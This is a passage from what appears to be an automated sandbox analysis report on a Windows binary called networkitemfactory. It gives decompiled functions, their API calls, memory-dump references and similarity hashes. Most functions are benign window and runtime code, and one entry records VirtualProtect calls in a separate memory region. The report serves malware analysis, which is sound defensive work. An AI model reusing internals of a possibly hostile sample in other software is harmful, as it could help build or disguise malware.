                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                      • String ID:
                                                                                                      • API String ID: 3058430110-0
                                                                                                      • Opcode ID: 3710f688a2b214f1cf60e7ff4e19daede13986bfed869f9c0a6359568c9f5529
                                                                                                      • Instruction ID: 478774b0f7d39393cd8bf266ab152c9b1bceb49f68e4d9ca76d912dad007dec8
                                                                                                      • Opcode Fuzzy Hash: 3710f688a2b214f1cf60e7ff4e19daede13986bfed869f9c0a6359568c9f5529
                                                                                                      • Instruction Fuzzy Hash: 9331C031600A46FFDB218E69C845BEB7BA7FF81310F15402AE86597291E734E891DB98
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E00401260(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                                      				struct tagPOINT _v12;
                                                                                                      				long _t12;
                                                                                                      				int _t20;
                                                                                                      				long _t22;
                                                                                                      
                                                                                                      				_t12 = GetWindowLongA(_a4, 0xffffffeb);
                                                                                                      				_t20 = _a8;
                                                                                                      				_t22 = _t12;
                                                                                                      				if(_t20 == 0x14) {
                                                                                                      					L6:
                                                                                                      					L00401005(_t22);
                                                                                                      					goto L7;
                                                                                                      				} else {
                                                                                                      					if(_t20 == 0x113) {
                                                                                                      						if(_a12 == 0x4b0) {
                                                                                                      							goto L6;
                                                                                                      						}
                                                                                                      						L7:
                                                                                                      						return 0;
                                                                                                      					} else {
                                                                                                      						if(_t20 == 0x205) {
                                                                                                      							GetCursorPos( &_v12);
                                                                                                      							TrackPopupMenu( *(_t22 + 0xc), 0, _v12, _v12.y, 0x64,  *(_t22 + 0x14), 0);
                                                                                                      							return 0;
                                                                                                      						} else {
                                                                                                      							return DefWindowProcA(_a4, _t20, _a12, _a16);
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}







                                                                                                      0x0040126c
                                                                                                      0x00401272
                                                                                                      0x00401275
                                                                                                      0x0040127a
                                                                                                      0x004012d7
                                                                                                      0x004012d9
                                                                                                      0x00000000
                                                                                                      0x0040127c
                                                                                                      0x00401282
                                                                                                      0x004012d5
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x004012de
                                                                                                      0x004012e4
                                                                                                      0x00401284
                                                                                                      0x0040128a
                                                                                                      0x004012a7
                                                                                                      0x004012bf
                                                                                                      0x004012cb
                                                                                                      0x0040128c
                                                                                                      0x004012a0
                                                                                                      0x004012a0
                                                                                                      0x0040128a
                                                                                                      0x00401282

                                                                                                      APIs
                                                                                                      • GetWindowLongA.USER32 ref: 0040126C
                                                                                                      • DefWindowProcA.USER32(?,?,?,?), ref: 00401296
                                                                                                      • GetCursorPos.USER32(?), ref: 004012A7
                                                                                                      • TrackPopupMenu.USER32(?,00000000,?,?,00000064,?,00000000), ref: 004012BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CursorLongMenuPopupProcTrack
                                                                                                      • String ID:
                                                                                                      • API String ID: 1794703793-0
                                                                                                      • Opcode ID: d5af5e9bbd54771d4f90c30ccf96748d4a38a08e97c498cb83b3451f644df746
                                                                                                      • Instruction ID: e542749ba296fdd87e3a5beb6a412bebb88910c97f6c43a1d3d2113e5c2dfe96
                                                                                                      • Opcode Fuzzy Hash: d5af5e9bbd54771d4f90c30ccf96748d4a38a08e97c498cb83b3451f644df746
                                                                                                      • Instruction Fuzzy Hash: B201753250410CBBDF259F94EC09AEF7B65EB04311F0046AAFE02A55F0D7B65960DB95
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 100%
                                                                                                      			E0041C101(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                      				intOrPtr _t25;
                                                                                                      				void* _t26;
                                                                                                      
                                                                                                      				_t25 = _a16;
                                                                                                      				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                                      					_t26 = E0041C670(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      					goto L9;
                                                                                                      				} else {
                                                                                                      					_t34 = _t25 - 0x66;
                                                                                                      					if(_t25 != 0x66) {
                                                                                                      						__eflags = _t25 - 0x61;
                                                                                                      						if(_t25 == 0x61) {
                                                                                                      							L7:
                                                                                                      							_t26 = E0041C1A5(_a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      						} else {
                                                                                                      							__eflags = _t25 - 0x41;
                                                                                                      							if(__eflags == 0) {
                                                                                                      								goto L7;
                                                                                                      							} else {
                                                                                                      								_t26 = E0041C924(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                                      							}
                                                                                                      						}
                                                                                                      						L9:
                                                                                                      						return _t26;
                                                                                                      					} else {
                                                                                                      						return E0041C845(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                                      					}
                                                                                                      				}
                                                                                                      			}





                                                                                                      0x0041c104
                                                                                                      0x0041c10a
                                                                                                      0x0041c17d
                                                                                                      0x00000000
                                                                                                      0x0041c111
                                                                                                      0x0041c111
                                                                                                      0x0041c114
                                                                                                      0x0041c12f
                                                                                                      0x0041c132
                                                                                                      0x0041c152
                                                                                                      0x0041c164
                                                                                                      0x0041c134
                                                                                                      0x0041c134
                                                                                                      0x0041c137
                                                                                                      0x00000000
                                                                                                      0x0041c139
                                                                                                      0x0041c14b
                                                                                                      0x0041c14b
                                                                                                      0x0041c137
                                                                                                      0x0041c182
                                                                                                      0x0041c186
                                                                                                      0x0041c116
                                                                                                      0x0041c12e
                                                                                                      0x0041c12e
                                                                                                      0x0041c114

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                      • String ID:
                                                                                                      • API String ID: 3016257755-0
                                                                                                      • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                      • Instruction ID: 9e2707e79c112db0bd1b87ffd3fb653869e533c69894d3168685ae0c76429fca
                                                                                                      • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                      • Instruction Fuzzy Hash: D4014E7608014ABBCF125E84CC81CEE3F62BB19354B588516FE1858132C23AC9B2AF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 85%
                                                                                                      			E0041349B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                      				intOrPtr* _t24;
                                                                                                      				void* _t28;
                                                                                                      				intOrPtr* _t40;
                                                                                                      				void* _t41;
                                                                                                      
                                                                                                      				_push(0xc);
                                                                                                      				_push(0x434708);
                                                                                                      				E00406830(__ebx, __edi, __esi);
                                                                                                      				_t28 = E00404224();
                                                                                                      				_t40 = E0040CFF1(8, 1);
                                                                                                      				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
                                                                                                      				if(_t40 != 0) {
                                                                                                      					E0040E856(_t28, __edx, 1, _t40, __eflags);
                                                                                                      					E0040DCE3(_t28, __edx, 1, _t40, __eflags);
                                                                                                      					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                                      					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
                                                                                                      					E00406D5B(0xc);
                                                                                                      					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
                                                                                                      					E0040E5C7( *_t40);
                                                                                                      					 *(_t41 - 4) = 0xfffffffe;
                                                                                                      					E00413B6A();
                                                                                                      					E00406D5B(0xd);
                                                                                                      					 *(_t41 - 4) = 1;
                                                                                                      					asm("lock xadd [eax], edi");
                                                                                                      					__eflags = 2;
                                                                                                      					 *(_t41 - 4) = 0xfffffffe;
                                                                                                      					E00413B76();
                                                                                                      					_t24 = _t40;
                                                                                                      				} else {
                                                                                                      					 *((intOrPtr*)(E00403FAC())) = 0xc;
                                                                                                      					_t24 = 0;
                                                                                                      				}
                                                                                                      				return E00406875(_t24);
                                                                                                      			}







                                                                                                      0x00413ad0
                                                                                                      0x00413ad2
                                                                                                      0x00413ad7
                                                                                                      0x00413ae1
                                                                                                      0x00413af0
                                                                                                      0x00413af2
                                                                                                      0x00413af7
                                                                                                      0x00413b08
                                                                                                      0x00413b0d
                                                                                                      0x00413b15
                                                                                                      0x00413b1a
                                                                                                      0x00413b1f
                                                                                                      0x00413b25
                                                                                                      0x00413b2b
                                                                                                      0x00413b31
                                                                                                      0x00413b38
                                                                                                      0x00413b3f
                                                                                                      0x00413b45
                                                                                                      0x00413b4b
                                                                                                      0x00413b4f
                                                                                                      0x00413b50
                                                                                                      0x00413b57
                                                                                                      0x00413b5c
                                                                                                      0x00413af9
                                                                                                      0x00413afe
                                                                                                      0x00413b04
                                                                                                      0x00413b04
                                                                                                      0x00413b63

                                                                                                      APIs
                                                                                                        • Part of subcall function 00404224: __getptd_noexit.LIBCMT ref: 00404225
                                                                                                        • Part of subcall function 00404224: __amsg_exit.LIBCMT ref: 00404232
                                                                                                      • __calloc_crt.LIBCMT ref: 00413AE9
                                                                                                        • Part of subcall function 0040CFF1: __calloc_impl.LIBCMT ref: 0040D000
                                                                                                      • __lock.LIBCMT ref: 00413B1F
                                                                                                      • ___addlocaleref.LIBCMT ref: 00413B2B
                                                                                                      • __lock.LIBCMT ref: 00413B3F
                                                                                                        • Part of subcall function 00403FAC: __getptd_noexit.LIBCMT ref: 00403FAC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
                                                                                                      • String ID:
                                                                                                      • API String ID: 2580527540-0
                                                                                                      • Opcode ID: 48566344ed146de0b8674f4dbf59565948250181c04cde4cea3d311e08d734ea
                                                                                                      • Instruction ID: 71ee6f97926f3856fb38d8acc99325eff636b6c3a3e39db7baf9f8622fdefe90
                                                                                                      • Opcode Fuzzy Hash: 48566344ed146de0b8674f4dbf59565948250181c04cde4cea3d311e08d734ea
                                                                                                      • Instruction Fuzzy Hash: 55019272A05300EBE720FFBB8802B4D77E0AF84725F21815FB055AB2D2DA7C5A41DA5D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 27%
                                                                                                      			E004013C0(void* __ecx, char _a4) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagRECT _v24;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t10;
                                                                                                      				char _t12;
                                                                                                      				intOrPtr _t17;
                                                                                                      				struct HWND__* _t18;
                                                                                                      				void* _t21;
                                                                                                      				void* _t25;
                                                                                                      				void* _t26;
                                                                                                      				void* _t27;
                                                                                                      				signed int _t28;
                                                                                                      
                                                                                                      				_t10 =  *0x435040; // 0x35ed344a
                                                                                                      				_v8 = _t10 ^ _t28;
                                                                                                      				_t12 = _a4;
                                                                                                      				_t27 = __ecx;
                                                                                                      				 *((char*)(__ecx + 0x1c)) = _t12;
                                                                                                      				if(_t12 != 1) {
                                                                                                      					_push(0);
                                                                                                      				} else {
                                                                                                      					_push(8);
                                                                                                      				}
                                                                                                      				CheckMenuItem( *(_t27 + 8), 0x8007, ??);
                                                                                                      				GetWindowRect(GetDesktopWindow(),  &_v24);
                                                                                                      				_t17 = _v24.right;
                                                                                                      				_push(0);
                                                                                                      				_push(0x15);
                                                                                                      				if( *((char*)(_t27 + 0x1c)) != 1) {
                                                                                                      					_push(0x60);
                                                                                                      					_t18 = _t17 + 0xffffff5a;
                                                                                                      				} else {
                                                                                                      					_push(0x6f);
                                                                                                      					_t18 = _t17 + 0xffffff4b;
                                                                                                      				}
                                                                                                      				SetWindowPos(0xffffffff, _t18, 0, ??, ??, ??, ??);
                                                                                                      				return E004023FF(_t21, _v8 ^ _t28, _t25, _t26, _t27,  *((intOrPtr*)(_t27 + 0x18)));
                                                                                                      			}















                                                                                                      0x004013c6
                                                                                                      0x004013cd
                                                                                                      0x004013d0
                                                                                                      0x004013d4
                                                                                                      0x004013d6
                                                                                                      0x004013db
                                                                                                      0x004013e1
                                                                                                      0x004013dd
                                                                                                      0x004013dd
                                                                                                      0x004013dd
                                                                                                      0x004013eb
                                                                                                      0x004013fc
                                                                                                      0x00401406
                                                                                                      0x00401409
                                                                                                      0x0040140b
                                                                                                      0x0040140d
                                                                                                      0x00401418
                                                                                                      0x0040141a
                                                                                                      0x0040140f
                                                                                                      0x0040140f
                                                                                                      0x00401411
                                                                                                      0x00401411
                                                                                                      0x00401427
                                                                                                      0x0040143b

                                                                                                      APIs
                                                                                                      • CheckMenuItem.USER32(?,00008007,00000000), ref: 004013EB
                                                                                                      • GetDesktopWindow.USER32 ref: 004013F5
                                                                                                      • GetWindowRect.USER32 ref: 004013FC
                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000060,00000015,00000000), ref: 00401427
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CheckDesktopItemMenuRect
                                                                                                      • String ID:
                                                                                                      • API String ID: 2929785785-0
                                                                                                      • Opcode ID: d7b958e3aee06e6d16f74cefa40718701726e5fac4f80c110971a0d47a9ed7f9
                                                                                                      • Instruction ID: 4ec6a214ad47736028020126bdc7e96f7facac43f8b83d50418b479398a935c3
                                                                                                      • Opcode Fuzzy Hash: d7b958e3aee06e6d16f74cefa40718701726e5fac4f80c110971a0d47a9ed7f9
                                                                                                      • Instruction Fuzzy Hash: B1017031544708BBDB109F78DC05F5B77B4AF14310F1047B5F641BA1F1C6B599059B58
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 40%
                                                                                                      			E004017C0(void* __ecx) {
                                                                                                      				signed int _v8;
                                                                                                      				struct tagRECT _v24;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t8;
                                                                                                      				intOrPtr _t13;
                                                                                                      				struct HWND__* _t14;
                                                                                                      				void* _t19;
                                                                                                      				void* _t23;
                                                                                                      				void* _t24;
                                                                                                      				void* _t25;
                                                                                                      				signed int _t26;
                                                                                                      
                                                                                                      				_t8 =  *0x435040; // 0x35ed344a
                                                                                                      				_v8 = _t8 ^ _t26;
                                                                                                      				_t25 = __ecx;
                                                                                                      				GetWindowRect(GetDesktopWindow(),  &_v24);
                                                                                                      				_t13 = _v24.right;
                                                                                                      				_push(0);
                                                                                                      				_push(0x15);
                                                                                                      				if( *((char*)(_t25 + 0x1c)) != 1) {
                                                                                                      					_push(0x60);
                                                                                                      					_t14 = _t13 + 0xffffff5a;
                                                                                                      				} else {
                                                                                                      					_push(0x6f);
                                                                                                      					_t14 = _t13 + 0xffffff4b;
                                                                                                      				}
                                                                                                      				SetWindowPos(0xffffffff, _t14, 0, ??, ??, ??, ??);
                                                                                                      				SetTimer( *(_t25 + 0x18), 0x4b0, 0x1f4, 0);
                                                                                                      				return E004023FF(_t19, _v8 ^ _t26, _t23, _t24, _t25,  *(_t25 + 0x18));
                                                                                                      			}














                                                                                                      0x004017c6
                                                                                                      0x004017cd
                                                                                                      0x004017d4
                                                                                                      0x004017de
                                                                                                      0x004017e8
                                                                                                      0x004017eb
                                                                                                      0x004017ed
                                                                                                      0x004017ef
                                                                                                      0x004017fa
                                                                                                      0x004017fc
                                                                                                      0x004017f1
                                                                                                      0x004017f1
                                                                                                      0x004017f3
                                                                                                      0x004017f3
                                                                                                      0x00401809
                                                                                                      0x0040181e
                                                                                                      0x00401834

                                                                                                      APIs
                                                                                                      • GetDesktopWindow.USER32 ref: 004017D7
                                                                                                      • GetWindowRect.USER32 ref: 004017DE
                                                                                                      • SetWindowPos.USER32(?,000000FF,?,00000000,00000060,00000015,00000000), ref: 00401809
                                                                                                      • SetTimer.USER32(?,000004B0,000001F4,00000000), ref: 0040181E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.517349671.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000004.00000002.517330948.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517474954.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517525073.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517547397.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000004.00000002.517583104.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_400000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$DesktopRectTimer
                                                                                                      • String ID:
                                                                                                      • API String ID: 91234172-0
                                                                                                      • Opcode ID: 1c68ad366e7c43d19bd62a89e4fa351b2cce032a6b5b0dd0a4360c209e5c7187
                                                                                                      • Instruction ID: 6b23f4df32dcc82ddab87783e5b9c350f650593cbea79607f5b37a938873731b
                                                                                                      • Opcode Fuzzy Hash: 1c68ad366e7c43d19bd62a89e4fa351b2cce032a6b5b0dd0a4360c209e5c7187
                                                                                                      • Instruction Fuzzy Hash: 5801F971A40708BBDB109B74DC0AF6B7774EB04711F1006B9FA12AA1E1DAB5AD049B48
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 02092468
                                                                                                      • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 020924B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000004.00000002.518992835.0000000002091000.00000020.00000001.sdmp, Offset: 02091000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_4_2_2091000_networkitemfactory.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: @
                                                                                                      • API String ID: 544645111-2766056989
                                                                                                      • Opcode ID: 8dc70fe77fb22ebc62900b305082405c4b08a28d3bd57062b53b834d1b190c9a
                                                                                                      • Instruction ID: c4c3e889d6774e0c9a904274861691b91208c856d1a96d80038ba5625e1557ae
                                                                                                      • Opcode Fuzzy Hash: 8dc70fe77fb22ebc62900b305082405c4b08a28d3bd57062b53b834d1b190c9a
                                                                                                      • Instruction Fuzzy Hash: C021E7B4E04209FFDF14CF98C984BAEBBB5BF45304F208599DD06AB240C774AA80EB55
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%